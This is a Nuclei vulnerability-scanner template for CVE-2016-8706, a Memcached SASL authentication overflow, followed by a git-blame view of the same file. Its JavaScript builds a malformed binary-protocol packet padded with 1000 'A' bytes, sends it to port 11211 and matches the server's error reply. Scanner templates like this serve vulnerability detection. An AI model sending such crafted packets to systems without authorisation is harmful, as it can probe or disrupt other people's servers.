javascript/cves/2016/CVE-2016-8706.yaml

id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.89998
    epss-percentile: 0.98714
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verfied: true
  tags: cve,cve2016,rce,js,memcached

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 4a0a004730450220383bbb7799bd6d7c41a424f73403d72b74a250524bafced2284dc91f813cb1cc022100d293f668c8df2fc5299025d834ac92832487e05bd6d145b2368433e30d478a20:922c64590222798bb761d5b6d8e72950
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`id: CVE-2016-8706`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`info:`
fix lint 2023-11-14 11:23:08 +05:30			`name: Memcached Server SASL Authentication - Remote Code Execution`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`author: pussycat0x`
			`severity: high`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30			`description: \|`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`reference:`
			`- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2016-8706`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`- http://rhn.redhat.com/errata/RHSA-2016-2819.html`
			`- http://www.debian.org/security/2016/dsa-3704`
			`- http://www.securitytracker.com/id/1037333`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.1`
			`cve-id: CVE-2016-8706`
			`cwe-id: CWE-190`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`epss-score: 0.89998`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 17:04:33 +05:30			`epss-percentile: 0.98714`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`cpe: cpe:2.3:a:memcached:memcached::::::::`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`metadata:`
Revert "chore: update TemplateMan 🤖" This reverts commit c31d574176f2b9e6f8d4fe573a24e7192f808e84. 2025-05-27 10:39:47 +08:00			`max-request: 1`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00			`vendor: memcached`
			`product: memcached`
Update CVE-2016-8706 2023-11-13 16:03:23 +05:30			`verfied: true`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`tags: cve,cve2016,rce,js,memcached`
Revert "chore: update TemplateMan 🤖" This reverts commit c31d574176f2b9e6f8d4fe573a24e7192f808e84. 2025-05-27 10:39:47 +08:00
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`javascript:`
JS pre-condition - update 2024-07-10 17:38:01 +05:30			`- pre-condition: \|`
			`isPortOpen(Host,Port);`
			`code: \|`
Create CVE-2016-8706 2023-10-30 13:36:00 +05:30			`let packet = bytes.NewBuffer();`
			`packet.Write(new Uint8Array([0x80, 0x21]))`
			`let cmd = 'stats'`
			`packet.WriteString(cmd)`
			`packet.Pack("!H", [32]);`
			`packet.Pack("!I", [1]);`
			`let buzz = Array(1000).fill("A").join('');`
			`packet.WriteString(buzz)`
			`const c = require("nuclei/net");`
			let conn = c.Open('tcp', `${Host}:${Port}`);
			`conn.SendHex(packet.Hex());`
			`conn.RecvString();`
			`args:`
			`Host: "{{Host}}"`
			`Port: 11211`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "Invalid arguments"`

			`- type: word`
			`words:`
			`- "Auth failure"`
			`negative: true`
chore: sign templates 🤖 2024-12-01 13:57:55 +00:00			`# digest: 4a0a004730450220383bbb7799bd6d7c41a424f73403d72b74a250524bafced2284dc91f813cb1cc022100d293f668c8df2fc5299025d834ac92832487e05bd6d145b2368433e30d478a20:922c64590222798bb761d5b6d8e72950`